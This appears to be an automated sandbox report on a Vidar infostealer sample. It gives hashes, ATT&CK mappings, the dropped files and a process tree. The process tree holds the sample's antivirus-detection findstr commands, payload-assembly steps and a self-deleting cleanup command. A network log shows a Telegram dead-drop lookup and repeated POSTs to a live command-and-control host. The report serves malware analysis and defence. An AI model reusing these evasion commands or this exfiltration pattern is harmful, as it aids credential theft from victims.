vidar | 31619be786bd17a126d0962c80871e93ea9263880cd98fad5a8aa450525e24d6

Analysis

max time kernel
149s
max time network
150s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
23/12/2024, 18:44 UTC

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

DuckMatter.exe
Size

1.2MB
MD5

9908fef6dfd69de72ffa10ae467c2502
SHA1

173888707b098b976976cd1ed0f3e57905de4d4b
SHA256

31619be786bd17a126d0962c80871e93ea9263880cd98fad5a8aa450525e24d6
SHA512

2eab6699e11a3fe7ea2956dc2ff1221b001f67ee4fd08eb7140fd6dfabbeb351b61680374cc46f2f8bb07abf5d945554f84ba0dded166eb572666397ba3fdaf9
SSDEEP

24576:Ep5OqtY0d/FzUuYnpaoW0yVdd0NRHp7xMsO4xt/5PQhHJ:KOqtYMzOAtnditRxMsr5PsHJ

Score

10^/10

vidar credential_access discovery spyware stealer

Malware Config

Signatures

Detect Vidar Stealer 4 IoCs

stealer

resource	yara_rule
behavioral2/memory/4088-73-0x0000000004650000-0x0000000004889000-memory.dmp	family_vidar_v7
behavioral2/memory/4088-72-0x0000000004650000-0x0000000004889000-memory.dmp	family_vidar_v7
behavioral2/memory/4088-81-0x0000000004650000-0x0000000004889000-memory.dmp	family_vidar_v7
behavioral2/memory/4088-80-0x0000000004650000-0x0000000004889000-memory.dmp	family_vidar_v7

Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar
Vidar family
vidar

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation	DuckMatter.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation	Conditioning.com

Deletes itself 1 IoCs

pid	Process
4088	Conditioning.com

Executes dropped EXE 1 IoCs

pid	Process
4088	Conditioning.com

Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Enumerates processes with tasklist 1 TTPs 2 IoCs

discovery

Process Discovery

T1057

pid	Process
3652	tasklist.exe
2264	tasklist.exe

Drops file in Windows directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SteadySpokesman	DuckMatter.exe
File opened for modification	C:\Windows\EndorsementHistoric	DuckMatter.exe
File opened for modification	C:\Windows\ClassifiedsReduction	DuckMatter.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 14 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	extrac32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	choice.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Conditioning.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	DuckMatter.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	Conditioning.com
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Conditioning.com

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
2308	timeout.exe

Suspicious behavior: EnumeratesProcesses 20 IoCs

pid	Process
4088	Conditioning.com
4088	Conditioning.com
4088	Conditioning.com
4088	Conditioning.com
4088	Conditioning.com
4088	Conditioning.com
4088	Conditioning.com
4088	Conditioning.com
4088	Conditioning.com
4088	Conditioning.com
4088	Conditioning.com
4088	Conditioning.com
4088	Conditioning.com
4088	Conditioning.com
4088	Conditioning.com
4088	Conditioning.com
4088	Conditioning.com
4088	Conditioning.com
4088	Conditioning.com
4088	Conditioning.com

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	3652	tasklist.exe
Token: SeDebugPrivilege	2264	tasklist.exe

Suspicious use of FindShellTrayWindow 3 IoCs

pid	Process
4088	Conditioning.com
4088	Conditioning.com
4088	Conditioning.com

Suspicious use of SendNotifyMessage 3 IoCs

pid	Process
4088	Conditioning.com
4088	Conditioning.com
4088	Conditioning.com

Suspicious use of WriteProcessMemory 39 IoCs

description	pid	Process	procid_target
PID 1940 wrote to memory of 3708	1940	DuckMatter.exe	83
PID 1940 wrote to memory of 3708	1940	DuckMatter.exe	83
PID 1940 wrote to memory of 3708	1940	DuckMatter.exe	83
PID 3708 wrote to memory of 3652	3708	cmd.exe	86
PID 3708 wrote to memory of 3652	3708	cmd.exe	86
PID 3708 wrote to memory of 3652	3708	cmd.exe	86
PID 3708 wrote to memory of 1264	3708	cmd.exe	87
PID 3708 wrote to memory of 1264	3708	cmd.exe	87
PID 3708 wrote to memory of 1264	3708	cmd.exe	87
PID 3708 wrote to memory of 2264	3708	cmd.exe	90
PID 3708 wrote to memory of 2264	3708	cmd.exe	90
PID 3708 wrote to memory of 2264	3708	cmd.exe	90
PID 3708 wrote to memory of 1180	3708	cmd.exe	91
PID 3708 wrote to memory of 1180	3708	cmd.exe	91
PID 3708 wrote to memory of 1180	3708	cmd.exe	91
PID 3708 wrote to memory of 1284	3708	cmd.exe	92
PID 3708 wrote to memory of 1284	3708	cmd.exe	92
PID 3708 wrote to memory of 1284	3708	cmd.exe	92
PID 3708 wrote to memory of 2028	3708	cmd.exe	93
PID 3708 wrote to memory of 2028	3708	cmd.exe	93
PID 3708 wrote to memory of 2028	3708	cmd.exe	93
PID 3708 wrote to memory of 3356	3708	cmd.exe	94
PID 3708 wrote to memory of 3356	3708	cmd.exe	94
PID 3708 wrote to memory of 3356	3708	cmd.exe	94
PID 3708 wrote to memory of 1560	3708	cmd.exe	95
PID 3708 wrote to memory of 1560	3708	cmd.exe	95
PID 3708 wrote to memory of 1560	3708	cmd.exe	95
PID 3708 wrote to memory of 4088	3708	cmd.exe	96
PID 3708 wrote to memory of 4088	3708	cmd.exe	96
PID 3708 wrote to memory of 4088	3708	cmd.exe	96
PID 3708 wrote to memory of 5064	3708	cmd.exe	97
PID 3708 wrote to memory of 5064	3708	cmd.exe	97
PID 3708 wrote to memory of 5064	3708	cmd.exe	97
PID 4088 wrote to memory of 3120	4088	Conditioning.com	110
PID 4088 wrote to memory of 3120	4088	Conditioning.com	110
PID 4088 wrote to memory of 3120	4088	Conditioning.com	110
PID 3120 wrote to memory of 2308	3120	cmd.exe	112
PID 3120 wrote to memory of 2308	3120	cmd.exe	112
PID 3120 wrote to memory of 2308	3120	cmd.exe	112

C:\Users\Admin\AppData\Local\Temp\DuckMatter.exe
"C:\Users\Admin\AppData\Local\Temp\DuckMatter.exe"
1⤵
- Checks computer location settings
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1940
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c move Camcorders Camcorders.cmd & Camcorders.cmd
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:3708
- - C:\Windows\SysWOW64\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    PID:3652
- - C:\Windows\SysWOW64\findstr.exe
    findstr /I "opssvc wrsa"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1264
- - C:\Windows\SysWOW64\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    PID:2264
- - C:\Windows\SysWOW64\findstr.exe
    findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1180
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c md 121759
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1284
- - C:\Windows\SysWOW64\extrac32.exe
    extrac32 /Y /E Including
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2028
- - C:\Windows\SysWOW64\findstr.exe
    findstr /V "Contracts" Food
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3356
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c copy /b ..\Dial + ..\Reaction + ..\Rw + ..\More C
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1560
- - C:\Users\Admin\AppData\Local\Temp\121759\Conditioning.com
    Conditioning.com C
    3⤵
    - Checks computer location settings
    - Deletes itself
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Checks processor information in registry
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    - Suspicious use of WriteProcessMemory
    PID:4088
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\Admin\AppData\Local\Temp\121759\Conditioning.com" & rd /s /q "C:\ProgramData\4O8YUKNY5XBA" & exit
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:3120
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 10
        5⤵
        System Location Discovery: System Language Discovery
        Delays execution with timeout.exe
        
        PID:2308
- - C:\Windows\SysWOW64\choice.exe
    choice /d y /t 5
    3⤵
    - System Location Discovery: System Language Discovery
    PID:5064

Network

DNS

8.8.8.8.in-addr.arpa

Remote address:

8.8.8.8:53

Request

8.8.8.8.in-addr.arpa

IN PTR

Response

8.8.8.8.in-addr.arpa

IN PTR

dnsgoogle
DNS

209.205.72.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

209.205.72.20.in-addr.arpa

IN PTR

Response
DNS

180.129.81.91.in-addr.arpa

Remote address:

8.8.8.8:53

Request

180.129.81.91.in-addr.arpa

IN PTR

Response
DNS

17.160.190.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

17.160.190.20.in-addr.arpa

IN PTR

Response
DNS

95.221.229.192.in-addr.arpa

Remote address:

8.8.8.8:53

Request

95.221.229.192.in-addr.arpa

IN PTR

Response
DNS

PSnYgndEtEpfpGbaxITGYKLCVq.PSnYgndEtEpfpGbaxITGYKLCVq

Conditioning.com

Remote address:

8.8.8.8:53

Request

PSnYgndEtEpfpGbaxITGYKLCVq.PSnYgndEtEpfpGbaxITGYKLCVq

IN A

Response
DNS

t.me

Conditioning.com

Remote address:

8.8.8.8:53

Request

t.me

IN A

Response

t.me

IN A

149.154.167.99
GET

https://t.me/k04ael

Conditioning.com

Remote address:

149.154.167.99:443

Request

GET /k04ael HTTP/1.1
Host: t.me
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Mon, 23 Dec 2024 18:45:06 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 12298
Connection: keep-alive
Set-Cookie: stel_ssid=fc4fe67e5cda72e70a_11141554111032289287; expires=Tue, 24 Dec 2024 18:45:06 GMT; path=/; samesite=None; secure; HttpOnly
Pragma: no-cache
Cache-control: no-store
X-Frame-Options: ALLOW-FROM https://web.telegram.org
Content-Security-Policy: frame-ancestors https://web.telegram.org
Strict-Transport-Security: max-age=35768000
DNS

bijutr.shop

Conditioning.com

Remote address:

8.8.8.8:53

Request

bijutr.shop

IN A

Response

bijutr.shop

IN A

188.245.216.205
GET

https://bijutr.shop/

Conditioning.com

Remote address:

188.245.216.205:443

Request

GET / HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: bijutr.shop
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx
Date: Mon, 23 Dec 2024 18:45:07 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
DNS

99.167.154.149.in-addr.arpa

Remote address:

8.8.8.8:53

Request

99.167.154.149.in-addr.arpa

IN PTR

Response
POST

https://bijutr.shop/

Conditioning.com

Remote address:

188.245.216.205:443

Request

POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----9ZMY5XTJ5XBIMYUSRIMO
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: bijutr.shop
Content-Length: 256
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx
Date: Mon, 23 Dec 2024 18:45:07 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

https://bijutr.shop/

Conditioning.com

Remote address:

188.245.216.205:443

Request

POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----XBAIMOPZ58YM7QIW4OHL
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: bijutr.shop
Content-Length: 299
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx
Date: Mon, 23 Dec 2024 18:45:08 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
DNS

205.216.245.188.in-addr.arpa

Remote address:

8.8.8.8:53

Request

205.216.245.188.in-addr.arpa

IN PTR

Response

205.216.245.188.in-addr.arpa

IN PTR

static205216245188clientsyour-serverde
DNS

e5.o.lencr.org

Conditioning.com

Remote address:

8.8.8.8:53

Request

e5.o.lencr.org

IN A

Response

e5.o.lencr.org

IN CNAME

o.lencr.edgesuite.net

o.lencr.edgesuite.net

IN CNAME

a1887.dscq.akamai.net

a1887.dscq.akamai.net

IN A

2.23.210.82

a1887.dscq.akamai.net

IN A

2.23.210.75
GET

http://e5.o.lencr.org/MFMwUTBPME0wSzAJBgUrDgMCGgUABBQeEcDJrP2kU%2B9LL2pzIRVgTVStuQQUmc0pw6FYJq96ekyEWo9ziGCw394CEgNwz8PXImKfnhVNHh00GVNPyQ%3D%3D

Conditioning.com

Remote address:

2.23.210.82:80

Request

GET /MFMwUTBPME0wSzAJBgUrDgMCGgUABBQeEcDJrP2kU%2B9LL2pzIRVgTVStuQQUmc0pw6FYJq96ekyEWo9ziGCw394CEgNwz8PXImKfnhVNHh00GVNPyQ%3D%3D HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/10.0
Host: e5.o.lencr.org

Response

HTTP/1.1 200 OK

Server: nginx
Content-Type: application/ocsp-response
Content-Length: 344
ETag: "B9B42073838921AAFDF1B2D682205E93C3EACD4403D3040271811EE98CA4616F"
Last-Modified: Mon, 23 Dec 2024 08:55:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=6684
Expires: Mon, 23 Dec 2024 20:36:32 GMT
Date: Mon, 23 Dec 2024 18:45:08 GMT
Connection: keep-alive
POST

https://bijutr.shop/

Conditioning.com

Remote address:

188.245.216.205:443

Request

POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----AIMOHVS0ZU37YU3OHLF3
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: bijutr.shop
Content-Length: 299
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx
Date: Mon, 23 Dec 2024 18:45:09 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
DNS

125.21.192.23.in-addr.arpa

Remote address:

8.8.8.8:53

Request

125.21.192.23.in-addr.arpa

IN PTR

Response

125.21.192.23.in-addr.arpa

IN PTR

a23-192-21-125deploystaticakamaitechnologiescom
DNS

82.210.23.2.in-addr.arpa

Remote address:

8.8.8.8:53

Request

82.210.23.2.in-addr.arpa

IN PTR

Response

82.210.23.2.in-addr.arpa

IN PTR

a2-23-210-82deploystaticakamaitechnologiescom
DNS

228.249.119.40.in-addr.arpa

Remote address:

8.8.8.8:53

Request

228.249.119.40.in-addr.arpa

IN PTR

Response
POST

https://bijutr.shop/

Conditioning.com

Remote address:

188.245.216.205:443

Request

POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----M7Y5PZUKXLNYU3OHDBIM
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: bijutr.shop
Content-Length: 300
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx
Date: Mon, 23 Dec 2024 18:45:09 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

https://bijutr.shop/

Conditioning.com

Remote address:

188.245.216.205:443

Request

POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----ZUKFK6PZ58YM7QQ1V3OP
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: bijutr.shop
Content-Length: 299
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx
Date: Mon, 23 Dec 2024 18:45:10 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

https://bijutr.shop/

Conditioning.com

Remote address:

188.245.216.205:443

Request

POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----AASR9H47QQ9ZUASRQ90H
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: bijutr.shop
Content-Length: 299
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx
Date: Mon, 23 Dec 2024 18:45:12 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

https://bijutr.shop/

Conditioning.com

Remote address:

188.245.216.205:443

Request

POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----V37YCBAAI58QIMG479HV
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: bijutr.shop
Content-Length: 299
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx
Date: Mon, 23 Dec 2024 18:45:12 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
DNS

200.163.202.172.in-addr.arpa

Remote address:

8.8.8.8:53

Request

200.163.202.172.in-addr.arpa

IN PTR

Response
DNS

15.164.165.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

15.164.165.52.in-addr.arpa

IN PTR

Response
DNS

18.134.221.88.in-addr.arpa

Remote address:

8.8.8.8:53

Request

18.134.221.88.in-addr.arpa

IN PTR

Response

18.134.221.88.in-addr.arpa

IN PTR

a88-221-134-18deploystaticakamaitechnologiescom
DNS

181.129.81.91.in-addr.arpa

Remote address:

8.8.8.8:53

Request

181.129.81.91.in-addr.arpa

IN PTR

Response
DNS

14.227.111.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

14.227.111.52.in-addr.arpa

IN PTR

Response

149.154.167.99:443

https://t.me/k04ael

tls, http

Conditioning.com

1.5kB
19.4kB
24
20

HTTP Request

GET https://t.me/k04ael

HTTP Response

200
188.245.216.205:443

https://bijutr.shop/

tls, http

Conditioning.com

1.0kB
3.0kB
11
8

HTTP Request

GET https://bijutr.shop/

HTTP Response

200
188.245.216.205:443

https://bijutr.shop/

tls, http

Conditioning.com

1.4kB
565 B
9
6

HTTP Request

POST https://bijutr.shop/

HTTP Response

200
188.245.216.205:443

https://bijutr.shop/

tls, http

Conditioning.com

1.5kB
598 B
9
7

HTTP Request

POST https://bijutr.shop/

HTTP Response

200
2.23.210.82:80

http://e5.o.lencr.org/MFMwUTBPME0wSzAJBgUrDgMCGgUABBQeEcDJrP2kU%2B9LL2pzIRVgTVStuQQUmc0pw6FYJq96ekyEWo9ziGCw394CEgNwz8PXImKfnhVNHh00GVNPyQ%3D%3D

http

Conditioning.com

467 B
861 B
5
3

HTTP Request

GET http://e5.o.lencr.org/MFMwUTBPME0wSzAJBgUrDgMCGgUABBQeEcDJrP2kU%2B9LL2pzIRVgTVStuQQUmc0pw6FYJq96ekyEWo9ziGCw394CEgNwz8PXImKfnhVNHh00GVNPyQ%3D%3D

HTTP Response

200
188.245.216.205:443

https://bijutr.shop/

tls, http

Conditioning.com

1.5kB
558 B
9
6

HTTP Request

POST https://bijutr.shop/

HTTP Response

200
188.245.216.205:443

https://bijutr.shop/

tls, http

Conditioning.com

1.5kB
558 B
10
6

HTTP Request

POST https://bijutr.shop/

HTTP Response

200
188.245.216.205:443

https://bijutr.shop/

tls, http

Conditioning.com

1.5kB
795 B
10
7

HTTP Request

POST https://bijutr.shop/

HTTP Response

200
188.245.216.205:443

https://bijutr.shop/

tls, http

Conditioning.com

1.5kB
518 B
9
5

HTTP Request

POST https://bijutr.shop/

HTTP Response

200
188.245.216.205:443

https://bijutr.shop/

tls, http

Conditioning.com

1.4kB
518 B
8
5

HTTP Request

POST https://bijutr.shop/

HTTP Response

200

8.8.8.8:53

8.8.8.8.in-addr.arpa

dns

66 B
90 B
1
1

DNS Request

8.8.8.8.in-addr.arpa
8.8.8.8:53

209.205.72.20.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

209.205.72.20.in-addr.arpa
8.8.8.8:53

180.129.81.91.in-addr.arpa

dns

72 B
147 B
1
1

DNS Request

180.129.81.91.in-addr.arpa
8.8.8.8:53

17.160.190.20.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

17.160.190.20.in-addr.arpa
8.8.8.8:53

95.221.229.192.in-addr.arpa

dns

73 B
144 B
1
1

DNS Request

95.221.229.192.in-addr.arpa
8.8.8.8:53

PSnYgndEtEpfpGbaxITGYKLCVq.PSnYgndEtEpfpGbaxITGYKLCVq

dns

Conditioning.com

99 B
174 B
1
1

DNS Request

PSnYgndEtEpfpGbaxITGYKLCVq.PSnYgndEtEpfpGbaxITGYKLCVq
8.8.8.8:53

t.me

dns

Conditioning.com

50 B
66 B
1
1

DNS Request

t.me

DNS Response

149.154.167.99
8.8.8.8:53

bijutr.shop

dns

Conditioning.com

57 B
73 B
1
1

DNS Request

bijutr.shop

DNS Response

188.245.216.205
8.8.8.8:53

99.167.154.149.in-addr.arpa

dns

73 B
166 B
1
1

DNS Request

99.167.154.149.in-addr.arpa
8.8.8.8:53

205.216.245.188.in-addr.arpa

dns

74 B
133 B
1
1

DNS Request

205.216.245.188.in-addr.arpa
8.8.8.8:53

e5.o.lencr.org

dns

Conditioning.com

60 B
159 B
1
1

DNS Request

e5.o.lencr.org

DNS Response

2.23.210.82

2.23.210.75
8.8.8.8:53

125.21.192.23.in-addr.arpa

dns

72 B
137 B
1
1

DNS Request

125.21.192.23.in-addr.arpa
8.8.8.8:53

82.210.23.2.in-addr.arpa

dns

70 B
133 B
1
1

DNS Request

82.210.23.2.in-addr.arpa
8.8.8.8:53

228.249.119.40.in-addr.arpa

dns

73 B
159 B
1
1

DNS Request

228.249.119.40.in-addr.arpa
8.8.8.8:53

200.163.202.172.in-addr.arpa

dns

74 B
160 B
1
1

DNS Request

200.163.202.172.in-addr.arpa
8.8.8.8:53

15.164.165.52.in-addr.arpa

dns

72 B
146 B
1
1

DNS Request

15.164.165.52.in-addr.arpa
8.8.8.8:53

18.134.221.88.in-addr.arpa

dns

72 B
137 B
1
1

DNS Request

18.134.221.88.in-addr.arpa
8.8.8.8:53

181.129.81.91.in-addr.arpa

dns

72 B
147 B
1
1

DNS Request

181.129.81.91.in-addr.arpa
8.8.8.8:53

14.227.111.52.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

14.227.111.52.in-addr.arpa

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Process Discovery

T1057

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\121759\C

Filesize
281KB

MD5
3bf50099b20498ddd1ba273763a8bf2a

SHA1
66fb6dc9fd5c6a1945868aa57d4d85b7747de5fc

SHA256
eafa6fb1e47f7ac7763d334901adf18ec11305767ef65aadb9a4b97ff322c818

SHA512
3485a4dddb598629ae5d3ed91ae8b165725c434b09a31db30cecca337e98527ad5570283e97180996b1f71d11d997fb93a36a2e09cac68680054cc2e23f125dc

Download Submit
C:\Users\Admin\AppData\Local\Temp\121759\Conditioning.com

Filesize
925KB

MD5
62d09f076e6e0240548c2f837536a46a

SHA1
26bdbc63af8abae9a8fb6ec0913a307ef6614cf2

SHA256
1300262a9d6bb6fcbefc0d299cce194435790e70b9c7b4a651e202e90a32fd49

SHA512
32de0d8bb57f3d3eb01d16950b07176866c7fb2e737d9811f61f7be6606a6a38a5fc5d4d2ae54a190636409b2a7943abca292d6cefaa89df1fc474a1312c695f

Download Submit
C:\Users\Admin\AppData\Local\Temp\Beverly

Filesize
89KB

MD5
423e53801596a3754f3381b00520324d

SHA1
af7edcc9397fb76ecf2565069d6a8a463aaad356

SHA256
5e239df69afe95bf5f6b7f2c73734f5077f0e81e68d335d1afc8a02095a08d44

SHA512
d03b2661b36575b2b7bf0973e9c7d7aef5e2bbd9cd2d5c79d387235de6705c9fc525cb4887754b7a2cde3bc6d712c51b0d400016e570ae9ccf893d8342ac6db2

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cabinet

Filesize
52KB

MD5
beca63186b42e3bd6e4fa41c8267cafb

SHA1
2752ce8c9f0e4147258ad7ee353e1cb7e1f21d2a

SHA256
22cabd142ba36370e14bc6e12be12447a0b6e076f5d0321af3aa03cf90535ddb

SHA512
1d30809c114a2ea2d09110f1b375fbe4e571a48bc7e0a999d6ea7f65db13050275beb3468a2ecdca7fbdfaf98702c679abb5d6f5b4b0ec694b20e5cc86a9870f

Download Submit
C:\Users\Admin\AppData\Local\Temp\Camcorders

Filesize
32KB

MD5
3301e26e06a9bdd9a1bc170c69e81c42

SHA1
b37eee171583d38339d47ad58245a3e1995b6773

SHA256
72d32e2ee62983f9a970a2c3fba99ffd16a568ecbdce30414137bccb357ddb8d

SHA512
e2f396a7ea35303ca30c508360c5308f7caad4d4b0e531a8abc7d5af9c91540c3ccbd7aeffad4d16f8195789c41a882031c025e2f8040718a0fdfa4ec6a456d2

Download Submit
C:\Users\Admin\AppData\Local\Temp\Carmen

Filesize
70KB

MD5
86535bd717538f76a712051215acffe0

SHA1
a35d175c770619532670489e220f7aea33e31b82

SHA256
ec71593a937b600a439fedd5c08443dd33f3fff54db79cb4c2fe1e8b115304a4

SHA512
05a6ede5dac033a468c19c665c8deb2ae07127548c43d1036b147ef97a660b61c91f9dcf6e11d7583fcdae9c6e1f86f91e7f6b3121be62970f1e54a158a69ec4

Download Submit
C:\Users\Admin\AppData\Local\Temp\Circumstances

Filesize
116KB

MD5
1e9912d485a7aa78f66dcc4600767d05

SHA1
8a54fd29685f4459f560e45614fd3247d372faeb

SHA256
0883bac437e48a02304fcb60f479cdddf341897f6efbff702fc97e2c62f4629b

SHA512
b3fe37cbf93dcd863a594723acb26c65779c194f292262fdc5c8d869a6e77a8d041e243fbb9e982deda8db23e0872f58659269d831ccc522a76eb06e08130f4e

Download Submit
